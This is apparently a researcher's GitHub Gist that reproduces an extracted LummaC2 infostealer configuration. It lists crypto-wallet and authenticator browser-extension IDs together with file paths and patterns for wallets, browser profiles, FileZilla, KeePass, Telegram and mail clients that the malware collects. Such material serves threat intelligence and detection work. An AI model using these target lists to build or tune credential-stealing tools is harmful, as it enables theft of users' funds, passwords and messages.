Created
February 19, 2024 05:24
-
-
Save RussianPanda95/f66a70712eafc21d10b78ae290a040cc to your computer and use it in GitHub Desktop.
LummaC2 config (3abe8b51f5087787b9c121b10f37108b)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"v": 4, | |
"se": true, | |
"ad": false, | |
"ex": [ | |
{ | |
"en": "ejbalbakoplchlghecdalmeeeajnimhm", | |
"ez": "MetaMask" | |
}, | |
{ | |
"en": "jnlgamecbpmbajjfhmmmlhejkemejdma", | |
"ez": "Braavos" | |
}, | |
{ | |
"en": "dlcobpjiigpikoobohmabehhmhfoodbb", | |
"ez": "Agrent X" | |
}, | |
{ | |
"en": "jgaaimajipbpdogpdglhaphldakikgef", | |
"ez": "Coinhub" | |
}, | |
{ | |
"en": "fcfcfllfndlomdhbehjjcoimbgofdncg", | |
"ez": "Leap Wallet" | |
}, | |
{ | |
"en": "lgmpcpglpngdoalbgeoldeajfclnhafa", | |
"ez": "Safepal" | |
}, | |
{ | |
"en": "dngmlblcodfobpdpecaadgfbcggfjfnm", | |
"ez": "MultiversX Wallet" | |
}, | |
{ | |
"en": "kppfdiipphfccemcignhifpjkapfbihd", | |
"ez": "ForniterWallet" | |
}, | |
{ | |
"en": "mmmjbcfofconkannjonfmjjajpllddbg", | |
"ez": "Fluvi Wallet" | |
}, | |
{ | |
"en": "loinekcabhlmhjjbocijdoimmejangoa", | |
"ez": "Glass Wallet" | |
}, | |
{ | |
"en": "heefohaffomkkkphnlpohglngmbcclhi", | |
"ez": "Morphis Wallet" | |
}, | |
{ | |
"en": "idnnbdplmphpflfnlkomgpfbpcgelopg", | |
"ez": "XVerse Wallet" | |
}, | |
{ | |
"en": "anokgmphncpekkhclmingpimjmcooifb", | |
"ez": "Compas Wallet" | |
}, | |
{ | |
"en": "cnncmdhjacpkmjmkcafchppbnpnhdmon", | |
"ez": "Havah Wallet" | |
}, | |
{ | |
"en": "ocjdpmoallmgmjbbogfiiaofphbjgchh", | |
"ez": "Sui Wallet" | |
}, | |
{ | |
"en": "ojggmchlghnjlapmfbnjholfjkiidbch", | |
"ez": "Venom Wallet" | |
}, | |
{ | |
"en": "nkbihfbeogaeaoehlefnkodbefgpgknn", | |
"ez": "MetaMask" | |
}, | |
{ | |
"en": "egjidjbpglichdcondbcbdnbeeppgdph", | |
"ez": "Trust Wallet" | |
}, | |
{ | |
"en": "ibnejdfjmmkpcnlpebklmnkoeoihofec", | |
"ez": "TronLink" | |
}, | |
{ | |
"en": "fnjhmkhhmkbjkkabndcnnogagogbneec", | |
"ez": "Ronin Wallet" | |
}, | |
{ | |
"en": "mcohilncbfahbmgdjkbpemcciiolgcge", | |
"ez": "OKX" | |
}, | |
{ | |
"en": "fhbohimaelbohpjbbldcngcnapndodjp", | |
"ez": "Binance Chain Wallet" | |
}, | |
{ | |
"en": "ffnbelfdoeiohenkjibnmadjiehjhajb", | |
"ez": "Yoroi" | |
}, | |
{ | |
"en": "jbdaocneiiinmjbjlgalhcelgbejmnid", | |
"ez": "Nifty" | |
}, | |
{ | |
"en": "afbcbjpbpfadlkmhmclhkeeodmamcflc", | |
"ez": "Math" | |
}, | |
{ | |
"en": "hnfanknocfeofbddgcijnmhnfnkdnaad", | |
"ez": "Coinbase" | |
}, | |
{ | |
"en": "hpglfhgfnhbgpjdenjgmdgoeiappafln", | |
"ez": "Guarda" | |
}, | |
{ | |
"en": "blnieiiffboillknjnepogjhkgnoapac", | |
"ez": "EQUA" | |
}, | |
{ | |
"en": "cjelfplplebdjjenllpjcblmjkfcffne", | |
"ez": "Jaxx Liberty" | |
}, | |
{ | |
"en": "fihkakfobkmkjojpchpfgcmhfjnmnfpi", | |
"ez": "BitApp" | |
}, | |
{ | |
"en": "kncchdigobghenbbaddojjnnaogfppfj", | |
"ez": "iWlt" | |
}, | |
{ | |
"en": "kkpllkodjeloidieedojogacfhpaihoh", | |
"ez": "EnKrypt" | |
}, | |
{ | |
"en": "amkmjjmmflddogmhpjloimipbofnfjih", | |
"ez": "Wombat" | |
}, | |
{ | |
"en": "nlbmnnijcnlegkjjpcfjclmcfggfefdm", | |
"ez": "MEW CX" | |
}, | |
{ | |
"en": "nanjmdknhkinifnkgdcggcfnhdaammmj", | |
"ez": "Guild" | |
}, | |
{ | |
"en": "nkddgncdjgjfcddamfgcmfnlhccnimig", | |
"ez": "Saturn" | |
}, | |
{ | |
"en": "cphhlgmgameodnhkjdmkpanlelnlohao", | |
"ez": "NeoLine" | |
}, | |
{ | |
"en": "nhnkbkgjikgcigadomkphalanndcapjk", | |
"ez": "Clover" | |
}, | |
{ | |
"en": "acmacodkjbdgmoleebolmdjonilkdbch", | |
"ez": "Rabby" | |
}, | |
{ | |
"en": "phkbamefinggmakgklpkljjmgibohnba", | |
"ez": "Pontem" | |
}, | |
{ | |
"en": "efbglgofoippbgcjepnhiblaibcnclgk", | |
"ez": "Martian" | |
}, | |
{ | |
"en": "nngceckbapebfimnlniiiahkandclblb", | |
"ez": "Bitwarden" | |
}, | |
{ | |
"en": "lpfcbjknijpeeillifnkikgncikgfhdo", | |
"ez": "Nami" | |
}, | |
{ | |
"en": "ejjladinnckdgjemekebdpeokbikhfci", | |
"ez": "Petra" | |
}, | |
{ | |
"en": "opcgpfmipidbgpenhmajoajpbobppdil", | |
"ez": "Sui" | |
}, | |
{ | |
"en": "aholpfdialjgjfhomihkjbmgjidlcdno", | |
"ez": "ExodusWeb3" | |
}, | |
{ | |
"en": "fhbohimaelbohpjbbldcngcnapndodjp", | |
"ez": "BinanceWallet" | |
}, | |
{ | |
"en": "onhogfjeacnfoofkfgppdlbmlmnplgbn", | |
"ez": "Sub" | |
}, | |
{ | |
"en": "mopnmbcafieddcagagdcbnhejhlodfdd", | |
"ez": "PolkadotJS" | |
}, | |
{ | |
"en": "fijngjgcjhjmmpcmkeiomlglpeiijkld", | |
"ez": "Talisman" | |
}, | |
{ | |
"en": "nlbmnnijcnlegkjjpcfjclmcfggfefdm", | |
"ez": "MewCX" | |
}, | |
{ | |
"en": "hifafgmccdpekplomjjkcfgodnhcellj", | |
"ez": "CryptoCom" | |
}, | |
{ | |
"en": "kpfopkelmapcoipemfendmdcghnegimn", | |
"ez": "Liquality" | |
}, | |
{ | |
"en": "aiifbnbfobpmeekipheeijimdpnlpgpp", | |
"ez": "Terra Station" | |
}, | |
{ | |
"en": "dmkamcknogkgcdfhhbddcghachkejeap", | |
"ez": "Keplr" | |
}, | |
{ | |
"en": "fhmfendgdocmcbmfikdcogofphimnkno", | |
"ez": "Sollet" | |
}, | |
{ | |
"en": "cnmamaachppnkjgnildpdmkaakejnhae", | |
"ez": "Auro" | |
}, | |
{ | |
"en": "jojhfeoedkpkglbfimdfabpdfjaoolaf", | |
"ez": "Polymesh" | |
}, | |
{ | |
"en": "flpiciilemghbmfalicajoolhkkenfe", | |
"ez": "ICONex" | |
}, | |
{ | |
"en": "nknhiehlklippafakaeklbeglecifhad", | |
"ez": "Nabox" | |
}, | |
{ | |
"en": "hcflpincpppdclinealmandijcmnkbgn", | |
"ez": "KHC" | |
}, | |
{ | |
"en": "ookjlbkiijinhpmnjffcofjonbfbgaoc", | |
"ez": "Temple" | |
}, | |
{ | |
"en": "mnfifefkajgofkcjkemidiaecocnkjeh", | |
"ez": "TezBox" | |
}, | |
{ | |
"en": "lodccjjbdhfakaekdiahmedfbieldgik", | |
"ez": "DAppPlay" | |
}, | |
{ | |
"en": "ijmpgkjfkbfhoebgogflfebnmejmfbm", | |
"ez": "BitClip" | |
}, | |
{ | |
"en": "lkcjlnjfpbikmcmbachjpdbijejflpcm", | |
"ez": "Steem Keychain" | |
}, | |
{ | |
"en": "onofpnbbkehpmmoabgpcpmigafmmnjh", | |
"ez": "Nash Extension" | |
}, | |
{ | |
"en": "bcopgchhojmggmffilplmbdicgaihlkp", | |
"ez": "Hycon Lite Client" | |
}, | |
{ | |
"en": "klnaejjgbibmhlephnhpmaofohgkpgkd", | |
"ez": "ZilPay" | |
}, | |
{ | |
"en": "aeachknmefphepccionboohckonoeemg", | |
"ez": "Coin98" | |
}, | |
{ | |
"en": "bhghoamapcdpbohphigoooaddinpkbai", | |
"ez": "Authenticator" | |
}, | |
{ | |
"en": "dkdedlpgdmmkkfjabffeganieamfklkm", | |
"ez": "Cyano" | |
}, | |
{ | |
"en": "nlgbhdfgdhgbiamfdfmbikcdghidoadd", | |
"ez": "Byone" | |
}, | |
{ | |
"en": "infeboajgfhgbjpjbeppbkgnabfdkdaf", | |
"ez": "OneKey" | |
}, | |
{ | |
"en": "cihmoadaighcejopammfbmddcmdekcje", | |
"ez": "Leaf" | |
}, | |
{ | |
"en": "bhhhlbepdkbapadjdnnojkbgioiodbic", | |
"ez": "Solflare" | |
}, | |
{ | |
"en": "mkpegjkblkkefacfnmkajcjmabijhclg", | |
"ez": "Magic Eden" | |
}, | |
{ | |
"en": "aflkmfhebedbjioipglgcbcmnbpgliof", | |
"ez": "Backpack" | |
}, | |
{ | |
"en": "gaedmjdfmmahhbjefcbgaolhhanlaolb", | |
"ez": "Authy" | |
}, | |
{ | |
"en": "oeljdldpnmdbchonielidgobddfffla", | |
"ez": "EOS Authenticator" | |
}, | |
{ | |
"en": "ilgcnhelpchnceeipipijaljkblbcob", | |
"ez": "GAuth Authenticator" | |
}, | |
{ | |
"en": "imloifkgjagghnncjkhggdhalmcnfklk", | |
"ez": "Trezor Password Manager" | |
}, | |
{ | |
"en": "bfnaelmomeimhlpmgjnjophhpkkoljpa", | |
"ez": "Phantom" | |
}, | |
{ | |
"en": "ppbibelpcjmhbdihakflkdcoccbgbkpo", | |
"ez": "UniSat" | |
} | |
], | |
"c": [ | |
{ | |
"t": 0, | |
"p": "%appdata%\\Electrum\\wallets", | |
"m": [ | |
"*" | |
], | |
"z": "Wallets/Electrum", | |
"d": 1, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%appdata%\\Ethereum", | |
"m": [ | |
"keystore" | |
], | |
"z": "Wallets/Ethereum", | |
"d": 1, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%appdata%\\Exodus\\exodus.wallet", | |
"m": ["*"], | |
"z": "Wallets/Exodus", | |
"d": 2, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%appdata%\\Ledger Live", | |
"m": ["*"], | |
"z": "Wallets/Ledger Live", | |
"d": 2, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%appdata%\\atomic\\Local Storage\\leveldb", | |
"m": ["*"], | |
"z": "Wallets/Atomic", | |
"d": 2, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%localappdata%\\Coinomi\\Coinomi\\wallets", | |
"m": ["*"], | |
"z": "Wallets/Coinomi", | |
"d": 2, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%appdata%\\Authy Desktop\\Local Storage\\leveldb", | |
"m": ["*"], | |
"z": "Wallets/Authy Desktop", | |
"d": 2, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%appdata%\\Bitcoin\\wallets", | |
"m": ["*"], | |
"z": "Wallets/Bitcoin core", | |
"d": 2, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%appdata%\\Binance", | |
"m": ["app-store.json", ".finger-print.fp", "simple-storage.json", "window-state.json"], | |
"z": "Wallets/Binance", | |
"d": 1, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%appdata%\\com.liberty.jaxx\\IndexedDB", | |
"m": ["*.leveldb"], | |
"z": "Wallets/JAXX New Version", | |
"d": 2, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%appdata%\\Electrum\\wallets", | |
"m": ["*"], | |
"z": "Wallets/Electrum", | |
"d": 2, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 1, | |
"p": "%localappdata%\\Google\\Chrome\\User Data", | |
"z": "Chrome" | |
}, | |
{ | |
"t": 0, | |
"p": "%appdata%\\AnyDesk", | |
"m": ["*.conf"], | |
"z": "Applications/AnyDesk", | |
"d": 2, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%appdata%\\FileZilla", | |
"m": [ | |
"recentservers.xml", | |
"sitemanager.xml" | |
], | |
"z": "Applications/FileZilla", | |
"d": 2, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%userprofile%", | |
"m": ["*.kbdx"], | |
"z": "Applications/KeePass", | |
"d": 2, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%appdata%\\Telegram Desktop", | |
"m": ["*s"], | |
"z": "Applications/Telegram", | |
"d": 3, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "C:\\Program Files\\Telegram Desktop", | |
"m": ["*s"], | |
"z": "Applications/Telegram", | |
"d": 3, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "C:\\Program Files (x86)\\Telegram Desktop", | |
"m": ["*s"], | |
"z": "Applications/Telegram", | |
"d": 3, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 1, | |
"p": "%localappdata%\\Google\\Chrome Beta\\User Data", | |
"z": "Chrome Beta" | |
}, | |
{ | |
"t": 1, | |
"p": "%appdata%\\Opera Software\\Opera Stable", | |
"z": "Opera" | |
}, | |
{ | |
"t": 1, | |
"p": "%localappdata%\\Opera Software\\Opera Neon\\User Data", | |
"z": "Opera Neon" | |
}, | |
{ | |
"t": 1, | |
"p": "%appdata%\\Opera Software\\Opera GX Stable", | |
"z": "Opera GX Stable" | |
}, | |
{ | |
"t": 1, | |
"p": "%localappdata%\\Microsoft\\Edge\\User Data", | |
"z": "Edge" | |
}, | |
{ | |
"t": 1, | |
"p": "%localappdata%\\BraveSoftware\\Brave-Browser\\User Data", | |
"z": "Brave" | |
}, | |
{ | |
"t": 1, | |
"p": "%localappdata%\\Epic Privacy Browser\\User Data", | |
"z": "EpicPrivacyBrowser" | |
}, | |
{ | |
"t": 1, | |
"p": "%localappdata%\\Vivaldi\\User Data", | |
"z": "Vivaldi" | |
}, | |
{ | |
"t": 1, | |
"p": "%localappdata%\\360Browser\\Browser\\User Data", | |
"z": "360Browser" | |
}, | |
{ | |
"t": 1, | |
"p": "%localappdata%\\CocCoc\\Browser\\User Data", | |
"z": "CocCoc" | |
}, | |
{ | |
"t": 2, | |
"p": "%appdata%\\Mozilla\\Firefox\\Profiles", | |
"z": "Mozilla Firefox" | |
}, | |
{ | |
"t": 0, | |
"p": "%userprofile%", | |
"m": [ | |
"*seed*.txt", | |
"*pass*.txt", | |
"*ledger*.txt", | |
"*trezor*.txt", | |
"*metamask*.txt", | |
"*bitcoin*.txt", | |
"*words*", | |
"*wallet*.txt" | |
], | |
"z": "Important Files/Profile", | |
"d": 3, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%userprofile%\\Desktop", | |
"m": [ | |
"*.txt", | |
"*.pdf" | |
], | |
"z": "Important Files/Desktop", | |
"d": 2, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%appdata%\\The Bat!", | |
"m": [ | |
"*.TBB", | |
"*.TBN", | |
"*.MSG", | |
"*.EML", | |
"*.MSB", | |
"*.mbox", | |
"*.ABD", | |
"*.FLX", | |
"*.TBK", | |
"*.HBI", | |
"*.txt" | |
], | |
"z": "Mail Clients/TheBat", | |
"d": 3, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "C:\\PMAIL", | |
"m": [ | |
"*.CNM", | |
"*.PMF", | |
"*.PMN", | |
"*.PML", | |
"*CACHE.PM", | |
"*.WPM", | |
"*.PM", | |
"*.USR" | |
], | |
"z": "Mail Clients/Pegasus", | |
"d": 3, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%localappdata%\\Mailbird\\Store", | |
"m": [ | |
"*.db" | |
], | |
"z": "Mail Clients/Mailbird", | |
"d": 3, | |
"fs": 20971520 | |
}, | |
{ | |
"t": 0, | |
"p": "%appdata%\\eM Client", | |
"m": [ | |
"*.dat", | |
"*.dat-shm", | |
"*.dat-wal", | |
"*.eml" | |
], | |
"z": "Mail Clients/EmClient", | |
"d": 3, | |
"fs": 20971520 | |
} | |
] | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment